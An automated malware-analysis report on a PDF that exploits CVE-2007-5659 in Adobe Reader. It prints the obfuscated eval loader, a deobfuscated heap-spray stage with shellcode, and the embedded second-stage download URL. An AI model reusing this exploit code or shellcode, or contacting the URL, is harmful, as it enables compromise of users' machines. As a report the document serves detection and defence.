PDF malware analysis — malicious · 142ecbcb50452733

MALICIOUS

PDF

17.5 KB

MD5: 7fa82a9ad67567c3d81ed81b2073bf38 SHA-1: 6a6c9f6c858baf5a9d6905b074eefa7055cbb275 SHA-256: 142ecbcb504527334f0d93b27269532ec2241d01d6c7aee67c934a43baaa2700

366 Risk Score

Malware Insights

MITRE ATT&CK

T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF contains obfuscated JavaScript that exploits CVE-2007-5659 in Adobe Reader. This script is designed to download a second-stage payload from the embedded URL 'http://begemotina.info/page/gold.php/n00a102801r0007J11000601R43329fdcXdfcb93e7Y597a73f3Z03006f36'. The presence of multiple JavaScript exploit-related heuristics and the embedded URL strongly indicate a malicious dropper.

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 10

Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659

PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
JavaScript action low 5 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATE

PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER

PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
Obfuscated multi-stage PDF JavaScript dropper high PDF_JS_OBFUSCATED_DROPPER

PDF JavaScript shows 4 independent signals of exploit-kit-style multi-stage obfuscation: annot_subject_stage, hex_codec_loop, incremental_eval_build, repeated_pluginschk. This is strongly consistent with pre-2011 Adobe Reader PDF droppers — OpenAction JS reads encoded data from annotation subjects, decodes it through one or more hex / base-N loops, and invokes eval indirectly (method name built one character at a time). The actual CVE is hidden in the final decoded layer and is not visible via static analysis.
PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL

Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
ClamAV: Pdf.Exploit.Agent-35901 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Pdf.Exploit.Agent-35901
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://begemotina.info/page/gold.php/n00a102801r0007J11000601R43329fdcXdfcb93e7Y597a73f3Z03006f36 Referenced by PDF JavaScript

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`javascript_obj0009_000.js` `4718a27c2224fc36bf24f8e8e04598f1ad78adce4401c7be2708318738a6983d`	pdf-javascript-stream	PDF /JS object 9 at offset 0x4364	469 bytes
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script var pr = null; var fnc = 'ev'; var sum = ''; app.doc.syncAnnotScan(); if (app.plugIns.length != 0) { var num = 1; pr = app.doc.getAnnots( { nPage: 0 } ); sum = pr[num].subject; } var buf = ""; if (app.plugIns.length > 3) { fnc += 'a'; var arr = sum.split(/-/); for (var i = 1; i < arr.length; i++) { buf += String.fromCharCode("0x"+arr[i]); } fnc += 'l'; } if (app.plugIns.length >= 2) { app[fnc]/**/(buf); }
`legacy_pdfkit_stage_000.js` `07c5bba628a1d5c036f4790ca8b02b70b480a90e6be90891e65bb509b88f026b`	deobfuscated-js	z-percent UTF-16BE base-21 decoded JavaScript at offset 0x1AC4	5284 bytes
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script var Lv3__r2C___7Jw0 = new Array();var B0WW_m4iVK = 0;var RFdoE0d52f = "";function lD__4y_Mk(g_g8tOj_17, jJ___Pt2335jnjC){var Lc3_3_A_1D_07 = jJ___Pt2335jnjC.toString();var js_0D3c = "";for(var X2lO4juR7F7_Xxd = 0; X2lO4juR7F7_Xxd < Lc3_3_A_1D_07.length; X2lO4juR7F7_Xxd++) {var W1S_O____QE = parseInt(Lc3_3_A_1D_07.substr(X2lO4juR7F7_Xxd, 1));if (!isNaN(W1S_O____QE)) {W1S_O____QE = W1S_O____QE.toString(16);if (W1S_O____QE.length == 1) { W1S_O____QE = "0" + W1S_O____QE; }else if (W1S_O____QE.length != 2) { W1S_O____QE = "00"; }js_0D3c = W1S_O____QE + js_0D3c;if (js_0D3c.length == 8) {break;}}}while(js_0D3c.length < 8) { js_0D3c = "0" + js_0D3c; }var K_b1J4u6_7ew34N = g_g8tOj_17.toString(16);if (K_b1J4u6_7ew34N.length == 1) { K_b1J4u6_7ew34N = "0" + K_b1J4u6_7ew34N; }else if (K_b1J4u6_7ew34N.length != 2) { K_b1J4u6_7ew34N = "00"; }js_0D3c = "3" + K_b1J4u6_7ew34N + "P" + js_0D3c;return js_0D3c;}function x__S_M(O_P_b__nSo_y, oV__GMy_15HA1uR){var c_3_Gey_56 = new Array("");var k_Ll2_P_6_465u = O_P_b__nSo_y;var Nas4_2l;if ((Nas4_2l = O_P_b__nSo_y.lastIndexOf("%u00")) != -1) {if (Nas4_2l + 6 == O_P_b__nSo_y.length) {c_3_Gey_56[0] = O_P_b__nSo_y.substr(Nas4_2l + 4, 2);k_Ll2_P_6_465u = O_P_b__nSo_y.substring(0, Nas4_2l);}}Nas4_2l = 1;for (X2lO4juR7F7_Xxd = 0; X2lO4juR7F7_Xxd < oV__GMy_15HA1uR.length; X2lO4juR7F7_Xxd++) {var CYM_fql = oV__GMy_15HA1uR.charCodeAt(X2lO4juR7F7_Xxd).toString(16);if (CYM_fql.length == 1) { CYM_fql = "0" + CYM_fql; }c_3_Gey_56[Nas4_2l] = CYM_fql;Nas4_2l++;}X2lO4juR7F7_Xxd = c_3_Gey_56[0].length ? 0 : 1;c_3_Gey_56[Nas4_2l] = "00";c_3_Gey_56[Nas4_2l + 1] = "00";Nas4_2l += 2;if ((c_3_Gey_56.length - X2lO4juR7F7_Xxd) % 2) {c_3_Gey_56[Nas4_2l] = "00";}while(X2lO4juR7F7_Xxd < c_3_Gey_56.length) {k_Ll2_P_6_465u += "%u" + c_3_Gey_56[X2lO4juR7F7_Xxd + 1] + c_3_Gey_56[X2lO4juR7F7_Xxd];X2lO4juR7F7_Xxd += 2;}k_Ll2_P_6_465u += "%u0000";return k_Ll2_P_6_465u;}function b_5Du8_4(HuIBRo, x_EH7__lC066Af){while (HuIBRo.length2<x_EH7__lC066Af) {HuIBRo += HuIBRo;}HuIBRo = HuIBRo.substring(0,x_EH7__lC066Af/2);return HuIBRo;}function E4_4S_aXhbCBr(g0NV3X1__Ka10a3, t5fl_w, X_VfIbG){var T1_1A8_o2V_yj = 0x0c0c0c0c;var HuIBRo = unescape(t5fl_w);var oV__GMy_15HA1uR = lD__4y_Mk(g0NV3X1__Ka10a3, X_VfIbG);var u50__eGU05 = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var O_P_b__nSo_y = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%ufbe9%u0000%u5f00%ua164%u0030%u0000%u408b%u8b0c%u1c70%u8bad%u2068%u7d80%u330c%u0374%ueb96%u8bf3%u0868%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%uf238%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%u00e8%uffff%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u7770%u7668%u7259%u6d43%u006d%u7468%u7074%u2f3a%u622f%u6765%u6d65%u746f%u6e69%u2e61%u6e69%u6f66%u702f%u6761%u2f65%u6f67%u646c%u702e%u7068%u6e2f%u3030%u3161%u3230%u3038%u7231%u3030%u3730%u314a%u3031%u3030%u3036%u5231%u3334%u3233%u6639%u6364%u6458%u6366%u3962%u6533%u5937%u3935%u6137%u3337%u3366%u305a%u3033%u3630%u3366%u0036";app.c1rMyVTFR_3f = unescape(x__S_M(O_P_b__nSo_y, oV__GMy_15HA1uR));var A__h_NA = 0x400000;var pw_J_1_a = u50__eGU05.length 2;var x_EH7__lC066Af = A__h_NA - (pw_J_1_a+0x38);HuIBRo = b_5Du8_4(HuIBRo, x_EH7__lC066Af);var j_7_u5HH_4 = (T1_1A8_o2V_yj - 0x400000)/A__h_NA;for (var VDE_87JO = 0; VDE_87JO < j_7_u5HH_4; VDE_87JO++) {Lv3__r2C___7Jw0[VDE_87JO] = HuIBRo + u50__eGU05;}}function d_5__28a__aF( ... (truncated)
`deobfuscated.js` `6e7180ee4c6c5dd6eefefd454f4f3bd00991bbf0c54e88e8d89b215d966e51e7`	deobfuscated-js	PDF JavaScript deobfuscation pass	118707 bytes
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 4 eval/decoder/string-building token(s). Carved artifact contains 2 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script 6800154577585a2i656b9h9f9i5hc3222a6g9j5g45bc7j0a388fa71ebh715gc12j9d3b1d7f29a07a5g7j9291318c991j889f8045biaf1c301f453j494b3h883a6h8h68502fah9d2d6db6b60f4512b22a4e7c885c0f4e7ha4ba0c3c503k773867669ha05f4b0i53ab3f32a99b9i3ca207c120a37g3b1847863cb68h03684b4fb1297f0jag6h1f7184284i6255b5727717b89h755k9j60bcag24414217194b871386a76b741e9e8926999b827e31bfada3bh6k6927b6033j4b85053g70a26j1c7c268f464h49b8820ibf0e7f629i2975149d0k933aa58b3h742i7j3da98j362da99e86b5bi71bc3d3e24597057925158c094704j148d4522bbbb24311c21b444a56873405abaa37c16697j3ha7156g8386718i5h3j1dah383f7iac254c9e46c34a414b1gbi4ac08ab99c00827a7507349bb2b3c32g8j7h177h00550697782b5ab299439f707902045e2d32742d653b4kbebd47b1bj692abka4829aa28i45190eak393g5e156h95740k8768126ka9538167875d101f0fbb0f486j91271h3d137d353259070823a87c8k5caa3b5kadb70kb0a10507013e6baf4c2f5k8g4549ai3k8c4f558b7d6haia3160e2a9h2e62290g779g258ha04a4iae7h2ba8b49b3gb3ad97213d3106174h448f5728755f7k5dad713k4a1e0g019b83c16h7h3d2a3ia99c29261i929d018i6h7934a4472g8d819f8i8gac0k1cc040a31g021b5f6e06b3276a292k70626ha07e0i7fb562a1c0a9bb5f88538ac05kbk044c1i69815g3879707h09376108165b3e725i077f5b8d29974412150dbg9j6d77263i3g1fa20f9c840i603779af865f5k2jaa62c035a09g6773726k1811146cae3f2i2i31472fa026459a28335472945e1c9d877989978c9j75882f5i9b24b8bc577h6653471b541b3h8i2770b18438168g6db05c4374417d3ha11c8d8jai8g1hc0094g438c7d9c319d261h38937j6h6h4j964kbca5ai82296b5j7d0eae661f6gb70b1b2kba9h7b4b4367bi1j424i6k07bb8h7f71925ha5be52bg1e2650169bae1954387k2f2h6c1d2c97a9727c7815238465a906af3kah7f1042926h58bk640i86c00j41746d6k4hai34a1bf5b555f7i3a745j8kbba42h9b313a5g9k7g3h39550407c00fai8i6324325gc12h2b7529898233636b5869528j2ibb93a049297e1a04506030232k2190055j8f3h522dah1g6196ak80aj1k067d020k7e5e3k9j246i80ba1c0h6d1b88118438aiad3d4e1k4cb104149f6d6i1h62302j429j5k0f113kbg2bb49g03a229511j297cbha270249g8b5e7a967i2b7791ab089h7k48c175b1c01e2d3c2h3g3b861381997641aa0iac40878667bj2b8c8db6be6i764fa74a7j7bai923462ad5h076k6b91492524bh4c0b093f5j6cag3e6324a0bi9533a50945a5b9955e908a1g4bajbc67bc8d4i08673e1a258757aa516kc0b8904744ab7hbk03aj2fb5073i2k2a043d8b4759ag7g6ic17b8052721072b57i894b3k3h001d3j5j89b629579e5b9h5g588a481d48c37ibe8b184g3c72260g9884ae9c145k88bh59014cbh9f6h2f1b7a7f6ib0726haj2i23b60f730h6b1j269fb8611i21905124938b061g9a480g24b5556h3a098f997kb18755188ibe5f8e934g5j040e9jbb0f3e6j9430317724b83d6b3e162426b78c9i3daj5k5j7hbja0af6c95930d395ab33f0b64bg5k59aj4b7i5a368b5c4i9b050dadb8872648203j8kb85ka9137a4gb7935gb2c3b64ebdb79f022d3db23b7h789c872fai3b897dc1704159bh0gagb86i152857161i472362be4k27a2b1ag988d6h169029399bbc975c69749jbdc06d9d581a2195682e9d3753293884673h87572ia60e92bh141f2555982d6b8i7018b7761ka3a19g447j4c7ab53k56ab1h754684731974459h4j833habc31a070ha33h003c53300718074cb3263f60a6b6646f73036a0h0h896e7269448i08bj0e42b03a2b136e14197i534g9b2f6b3k4j76380c8i07978i8ic31a57043258a54ha1ba3485648d7c0g5a3460b01h68bjb127408i9124533a421b901g7ib17hb59j683ab3274h3ib66e8g318731af08666g4a763b967a23108347495f5051c39394538fbj060i1h2814694b1i930c0k193h5d1ka87ea39kab698hba57970ebj8d098ebk517945754k1f722b4389b6439b714722416f9a161b3a1d9a3b85c276690b3k0d8319353f9b7d961b84269i9b5a55225i31653bbk9ja371c3201b59b78i6h0774a52ibd8gb77j4126052c9d2d1b4f59a5a0788672694j769k3h97b78i72ac73aec24d1i3a140i2h880772a3638k261da863578a8d941jacb2210k7k53710f2c9i7hbg2e305d1d503d8a60akaa633f084c10114f9e7aa8578a0c0g24c36j4012327ibe746c8i686g4f0k079hbk06813j6765495k947h006c641kb66h671k935ib99ic34g4f3245437ib66k766e5fb90dc138698556ae24bkai98b9616957ah335e7fb4c21043a8691g785ea16i1d242c83c0b9346g80932g420kac0da36g8k912b67bb5j6f704i191bbhbc64bc9b723d564e13518g34bh464g07057e30258d6c1305b1b0bga71c1j1b9j2g82612ia99d9g3f875j248k0e72b5a280815g34b0091i5j82bg354a7k3ka05g4b5a3j3f31a0688c960f8c6f6iak188d8kbb184g8j92355e25692d6967072c829c3g7c7b3ha3be64bb1a6i1c551h64ag047h2g2d605d1a8h88a70bb23gaf1a8h2648721f8h9c901e8b781c88044fag97504f45090fa5a6367k801d2978077d4h564gb9b923a8847d409g3j3ba49716b5a0000c2k2i5i00771445b37d2a1a4h965i658k524e9i083db0127426522d296f99369c0f4j0b2h725g9j9h9e4b83837fbj3g720i2k72749j9g3gb6518g5cb84h271a0c1hbi98953d318a411e4b25a02c604i6i9ca8a17c6422864739aa916i6d628g06b10e48a15e2b529g65408b3982 ... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.